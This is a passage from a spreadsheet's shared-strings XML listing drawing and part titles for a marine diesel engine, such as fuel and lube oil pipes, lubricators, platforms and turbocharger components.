    <t>MOUNT.OF FLYWHEEL POINTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARRANGEMENT OF ROLLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNTING OF TURNINGMOTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEC.PIN FOR TURNINGMOTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BODY PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR STARTER MOUNTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF PIPE FOR AIR START</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPARE PART DRAWING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WASTE TRAY-ALTERATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE FOR VENTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT. OF FUEL OIL FILTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLAPS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF LUB.OIL FILTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSY OF FILTER INSERT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSY OF CHAIN DRIVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASSY OF SPINDLE GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE-AIR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE-VENTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FILTER PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT. OF LUB. OIL FILTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSERT FOR LUB.OIL COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COMBI COOLER, MOUNTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNTING OF PLATE COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COMBINED PLATE COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ALCU I</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ALCU II</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MEP ARRANGEMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOUSING FOR LUBR. COMPLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHAFT-LUBRICATOR DRIVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACKET-LUBRICATOR DRIVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ECCENTRIC ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON CONTROL Y56</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON CONTROL COMPL. Y56</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MASTER CONTROL UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SWITCH BOARD UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ALCU-COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CABLING OF EL.LUBRICATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ALPHA LUBRICATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR. BLOCK + LUBRICATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PARTS LIST-GENERAT.DRIVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.OF TACHO PICK-UPS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIST OF PLATES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF PRESS GAUGE PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT F. PRESS. G.PANEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ALARM CLUTCH, WRONG-WAY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PARTS LIST-CONTROL PANEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEST EQUIP. F.ALPHA-LUBR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Seals tool, actuator, lubricator</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL PUMP ASSEMBLY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNTING OF PUMPS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT. OF SHAFT FRONT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GEARWHEEL,</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL GAS VENTING PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT. OF RES. GEAR WHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TECH.DATA, TURBOCHARGER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ORDER LIST-COOLER INSERT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF AIR COOL.-67,80,90</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ORDER LIST-EMERG.BLOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AUX. BLOWER INCL. HEATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Order list - VTA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Variable turbocharger</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Order list-auto tuning</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.LUB.OF CHARGER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF CHEM.CLEANING A.C.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUCT.CHEM.CLEAN A.C.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVER W.GUIDING TUBE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MIX.TANK F.CHEM.CLEAN A.C</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE F. PULLROD. LOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE F.PULLROD. UPPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE RAIL A.C. REAR END</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS FOR ROTOR CLEANING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF CLEANING TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS FOR EXH. RECEIVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS FOR TC-REP.+BLOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF CHEMICAL CLEANING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TROLLEY F.COOLER INSERT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Roots blower complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROTOR FOR ROOTS BLOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALL.BRACKET-UPPER-REAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALL.BRACKET-CENTRE-REAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF TC/AC UNIT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF AIR COOLER FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF AUX.BLOWER DUCTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF TC GAS PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF GAS OUTLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALL.BRACKET LOWER MAN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOP BRACING-UPP.-MAN.SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOP BRACING ON AFT END</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALLERY BRACKET, WELDING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALLERY BRACKET, MACHINING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Seating, TC/AC welding</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEATING, TC/AC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEATING, SPECIAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEATING, EXH. RECEIVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEATING,AIR COLLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIRCOOLER FRAME-FORE,MACH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIRCOOLER FRAME-FORE,WELD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AIR COOLER FRAME-AFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNTING FOR CRANE BEAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANE BEAM FOR AIR COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STANCHION ASSY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RING W. COPPER COLLAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COLLAR ON FLOOR PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD RAIL AND PLATF.ARR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Side stringer</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFORMS-MAN.SIDE ARR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE-MAN.SIDE+END ARR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFORM ARR.TOP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFORM-LOWER-TOP VIEW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALL.BRACK.ARR-LOW.MAN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALL.BRACK.+PIPES-UPPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALL.BRACK.+PIPES-CENTRE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALL.BRACK.+PIPES-LOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFORM ARR-UPPER-MAN.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFORM ARR-LOWER MAN.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAN.SIDE-TOP+END VIEW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFORMS-EXH. SIDE ARR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF PLATFORM, EXH.SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALL.BRACK.ARR-UPPER-REAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALL.BRACK.ARR-CENT.REAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFORM ARR-UPPER-REAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFFORM ARR.-CENTER EXH.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARRANGEMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLAT FORM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME PARTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ALARM, THRUSTBEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stopper segment, fore</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Stopper segment, aft</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACKET FOR ALARM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING TOOL,THRUST SHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR JACK SEGMENT STOPPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.JACK JOURNAL BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDR.JACK TUNING WEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Sketches</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL INLET PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL PIPE-INLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL PIPE, INLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL O.PIPE INLET-OUTLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUNDRY PIPES-A OR B SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUNDRY PIPES-CYL.PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUNDRY PIPES-FORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE-FUEL OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPES-UPPER MAN.SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE FUEL OIL INLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE-FUEL OIL OUTLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT-FUEL OIL,FIXED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.OF FUEL OIL H.P.-PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLING OIL-FUEL VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL PIPE-OUTLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VENTILATING PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PIPE-SHOCK ABSORBER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PIPE-CAMSHAFT FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OVERFLOW-FUEL OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEATING PIPE FUEL PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>F.O.RETURN FROM UMBR.SEAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE-DRAIN FUEL OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PIPE,UMBRELLA</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN F. FUEL OIL PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN-H.P. PIPES CHECKING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF F.O. REG. VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. BRACKETS CYL. SEC.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING OIL DISTRIB. PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF DRAIN PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL INLET FILTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT. OF MAIN PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE CYL. SECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE INLET FUEL OIL PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL ARRANGEMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHIELDED FUEL INJECT.PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASS.SHIELD FUEL INJ.PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL INJ.PIPE-STRAIGHT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF DRAIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL VENTING BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUNNEL-FUEL OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPES ON FORE END</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL DRAIN PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL INLET-PRIM.PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACKET FOR F.O. FILTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADJUSTABLE ELBOW COUPLING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESSURE GAUGE VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PIPE-EXHAUST VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPES FOR AIR,EXH.VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFTING DEVICE CYL.1</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.OF LIFTING DEVICE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNTING OF DLAPHRAGM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF OVERSPEED CONTROL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPES-ZERO SETTING-F.PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPES FOR LIFTING DEVICE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DEVICE FOR ALARM SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MILL.TOOL-FUEL OIL PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PRESS. TEST TOOLS HP PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PARTS LIST-LUBRICAT.OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SYSTEM OIL INLET PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL VALVE+ACTUATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE BEND-COOLING OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPES FOR GENERATOR ARR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT LUB. OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT-LUB.OIL BEDPLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL PIPE-VIBR.DAMPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL PIPE-CHAIN BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>L.O.PIPE-JOURNAL BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL PIPE-PUMP DRIVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUBRICATING OIL PIPE-AFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Lub.oil, thrust brg.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>L.O.PIPE-MOMENT COMPENS.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>L.O.PIPE-AXIAL VIBR.DETU.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>L.O.PIPE-TORQUE EQUALIZER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB. OIL PIPE-CYL.LUB.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE WITH STUDS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL INLET FUEL PUMP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VAR.HYDRAULIC DRG.F.INMOS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLUSHING HYDR.OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL PIPE INVA VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PIPE-CYL.FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PIPE-STUFFING BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL PIPE-CAMSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL PIPE,CAMSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VARIOUS PIPES-MAN. SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL PIPE-AMPLIFIER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAINP. ASSY BEDPLATE MAN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN, STUFF.BOX+BEDPLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL.P.OUTL.,LUB.GEAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE-L.O.OUT.CAMSH.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL.LUB.OIL PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE-DRAIN BEDPLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INFI PRESSURE (P)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INVA PRESSURE (P)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Drain HPS box</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PARTS LIST-VERTICAL PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VARIOUS PIPES-FRAME MAN.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE-CYL.LUBRICATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LEAK OIL DRAIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>El. Heating cyl.oil. pipes</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPLEMENT-L.O.SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL PIPE-ACTUATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL PIPE-FUEL CAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL PIPE-EXHAUST CAM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL PIPE-CAM SHIELD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VENTING TANK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUBE OIL PIPE-CAMSHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL PIPE-DRAIN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>L.O.PIPE-DRAIN ROL.GUIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUBE OIL PIPE-CYL. LINER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE LUB.O.-ACTUATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE-SCAVENGE BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>P/L-LUB.OIL.PIPE-INSIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAINPIPE-SCAV.AIR RECEIV</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR.INTERNAL LUB.OIL PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE-DRAIN-CYL.FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PIPE-LUBRICATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PIPE-TOP GUARD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PIPE-CYL. COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN-SCAVENGE AIR PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN-BRANCH PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL PIPE-TURBOCHARGER</t>
